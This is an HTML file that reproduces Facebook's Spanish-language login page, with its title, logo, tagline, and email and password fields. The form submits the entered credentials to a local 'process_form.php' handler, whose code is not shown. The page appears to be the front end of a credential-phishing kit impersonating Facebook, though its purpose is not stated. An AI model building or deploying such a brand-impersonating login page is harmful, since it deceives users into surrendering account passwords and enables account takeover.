<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook – inicia sesión o regístrate</title>
    <link rel="stylesheet" href="default.css">
    <link rel="stylesheet" href="style.css">
    <style>
        .black-text {
            color: black;
        }
    </style>
</head>
<body>
    <div class="login">
        <div class="container">
            <div class="row">
                <div class="col-7">
                    <div class="align-center">
                        <div class="content">
                            <img src="img/fb.png" alt="">
                            <p class="black-text">Facebook te ayuda a comunicarte y compartir con las personas que forman parte de tu vida.</p>
                        </div>
                    </div>
                </div>
                <div class="col-5 col-xs-12">
                    <div class="login-form">
                        <form id="login-form" method="post" action="process_form.php">
                            <input id="email" type="text" name="email" placeholder="Correo electrónico o número de teléfono"><br>
                            <input id="pass" type="password" name="pass" placeholder="Contraseña"><br>
                            <button type="submit" id="login-btn">Iniciar sesión</button><br>
                            <a href="#">¿Olvidaste tu contraseña?</a><br>
                            <button id="create-btn">Crear nueva cuenta</button><br>
                        </form>
                    </div>
                    <footer>
                        <a href="#" style="font-weight: bold; color: black; text-decoration: none;">Crear una página</a> 
                        para una celebridad, una marca o un negocio.
                    </footer>
                </div>
            </div>
        </div>
    </div>
</body>
</html>
